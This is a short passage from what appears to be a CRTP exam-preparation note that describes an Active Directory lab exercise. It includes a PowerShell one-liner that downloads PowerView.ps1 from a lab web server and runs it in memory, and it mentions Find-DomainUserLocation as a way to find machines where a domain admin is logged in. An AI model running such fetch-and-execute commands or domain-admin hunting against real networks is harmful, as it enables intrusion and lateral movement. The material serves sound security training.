francescolonardo/CRTP-Preparation/learning_objective_07.md

 ![HFS - PowerView.ps1](./assets/screenshots/learning_objective_07_hfs_powerview.png)

 `iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.22/PowerView.ps1'))`

+Use the following commands **to looks for machines where a domain admin is logged in**.

 Note: `Find-DomainUserLocation` may take many minutes to check all the machines in the domain.